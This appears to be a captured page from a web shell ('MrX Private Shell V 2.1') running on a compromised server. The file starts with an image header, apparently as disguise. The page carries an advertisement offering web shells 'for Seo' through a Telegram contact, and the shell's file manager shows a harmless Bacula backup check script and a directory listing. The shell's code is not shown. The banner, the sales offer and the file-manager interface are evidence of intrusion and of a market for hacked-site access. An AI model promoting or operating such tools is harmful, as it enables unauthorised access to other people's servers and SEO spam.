����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
# # Check that Bacula is installed and that its configuration files exist if [ "$BEXTRACT_DEVICE" -o "$BEXTRACT_VOLUME" ]; then ### Bacula support using bextract has_binary bextract || Error "Bacula 'bextract' is missing" [ -s $BACULA_CONF_DIR/bacula-sd.conf ] || Error "Bacula configuration file '$BACULA_CONF_DIR/bacula-sd.conf' missing" else ### Bacula support using bconsole has_binary bacula-fd || Error "Bacula File Daemon 'bacula-fd' is missing" [ -s $BACULA_CONF_DIR/bacula-fd.conf ] || Error "Bacula configuration file '$BACULA_CONF_DIR/bacula-fd.conf' missing" has_binary bconsole || Error "Bacula console executable 'bconsole' is missing" [ -s $BACULA_CONF_DIR/bconsole.conf ] || Error "Bacula configuration file '$BACULA_CONF_DIR/bconsole.conf' missing" fi
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| 400_prep_bacula.sh | File | 955 B | 0644 |
|
| 450_check_BACULA_client_configured.sh | File | 802 B | 0644 |
|
| 500_check_BACULA_bconsole_results.sh | File | 1.82 KB | 0644 |
|